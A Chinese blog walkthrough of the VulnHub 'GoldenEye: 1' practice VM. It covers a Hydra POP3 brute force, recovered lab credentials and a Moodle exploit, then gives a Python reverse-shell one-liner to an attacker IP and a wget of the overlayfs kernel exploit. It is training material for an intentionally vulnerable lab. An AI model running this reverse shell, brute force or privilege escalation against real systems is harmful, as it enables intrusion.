当前位置: 首页 > ds >正文

GoldenEye

GoldenEye: 1

About Release Back to the Top
  • Name: GoldenEye: 1
  • Date release: 4 May 2018
  • Author: creosote
  • Series: GoldenEye
下载:
  • GoldenEye-v1.ova (Size: 805 MB)
  • Download: https://drive.google.com/open?id=1M7mMdSMHHpiFKW3JLqq8boNrI95Nv4tq
  • Download (Mirror): https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova

主机信息收集

发现5个IP 挨个ping一下,确认是哪台
ttl值 默认初始值128 windows
默认初始值64 linux
unix 255
windows修改默认ttl值 Windows 系统的 ping 命令 TTL 初始值?:可以通过修改注册表来实现。 打开注册表编辑器,找到 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters” 路径, 在右侧窗口中新建一个名为 “DefaultTTL” 的 DWORD 值,然后根据需要设置其数值数据(例如,设置为 64),重启电脑后生效。 但修改注册表有风险,操作前建议备份注册表。

网站信息探测

http://192.168.2.25/ 给出了一个路径/sev-home/ 访问是一个登录
查看源码,有一个js文件,
查看内容注释中 获得两个用户名,一个html编码的密码
用户名:Boris Natalya boris natalya
密码: InvincibleHack3r
192.168.2.25/sev-home/ 通过 boris InvincibleHack3r 登录成功
查看源代码最后的注释中给出了前面我们得到的用户名
pop3的端口,密码为默认,账户为上面的账户

邮件服务爆破

pop3测试
hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.2.25 -s 55007 pop3
获得账户 (这里为了快点直接新建写进去吧)
[55007][pop3] host: 192.168.2.25 login: natalya password: bird
[55007][pop3] host: 192.168.2.25 login: boris password: secret1!
nc链接看看
获取一个名字 Janus
username: xenia
password: RCP90rulez!
severnaya-station.com 域名
/gnocertdir 路径
alec@janus.boss
Xenia
查看所有发现以上信息
配置hosts文件
192.168.2.25 severnaya-station.com
Moodle的cms版本可以用 whatwab查一下,我这里有问题
http://evernaya-station.com/gnocertdir
登录 使用上面邮件得到的密码
查看各页面找到一个邮件
继续爆破 doak的邮箱 看看有什么有邮件
[55007][pop3] host: 192.168.2.25 login: doak password: goat
获取到一个账户密码
username: dr_doak
password: 4England!
找到一个路径
/dir007key/for-007.jpg
通过 exiftool 获得图片信息 明显的一串 bas64解码
admin xWinter1995x! 管理员密码
Moodle 2.2.3 版本 找一下nday
配置一下带有yes的项
添加paload
成功获得主机 www权限
需要提权
首先弹个shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.11",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
通过uname -a获取内核版本提权
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit
文件中将gcc改为cc,开启一个服务,wget过去
wget http://192.168.2.11:8087/37292.c
http://www.xdnf.cn/news/10604.html

相关文章:

  • 机器学习-ROC曲线​​ 和 ​​AUC指标
  • 内存管理 : 06 内存换出
  • 不使用绑定的方法
  • 剑指offer hot100 第三周
  • 邂逅Webpack和打包过程
  • 基于python大数据的音乐可视化与推荐系统
  • hadoop完整安装教程(附带jdk1.8+vim+ssh安装)
  • [AI算法] LLM中的gradient checkpoint机制
  • Office办公文档软件安装包2024版
  • Ubuntu终端性能监视工具
  • 概率单纯形(Probability Simplex)
  • 关于神经网络中的激活函数
  • 【Linux命令】scp远程拷贝
  • 什么是promise
  • UI 设计|提高审美|极简扁平过时吗?
  • “人单酬“理念:财税行业的自我驱动革命
  • ZLG ZCANPro,ECU刷新,bug分享
  • 系统架构设计师(一):计算机系统基础知识
  • 【C++高级主题】命令空间(六):重载与命名空间
  • 8天Python从入门到精通【itheima】-60~61
  • 笔试笔记(运维)
  • LeetCode - 965. 单值二叉树
  • 计算机网络第1章(下):网络性能指标与分层模型全面解析
  • PCB设计教程【强化篇】——USB拓展坞PCB布线
  • javaEE->多线程:定时器
  • 【Hot 100】45. 跳跃游戏 II
  • Python训练第四十一天
  • 【创新实训个人博客】实现了新的前端界面
  • CP4-OFDM模糊函数原理及仿真
  • 三方接口设计注意事项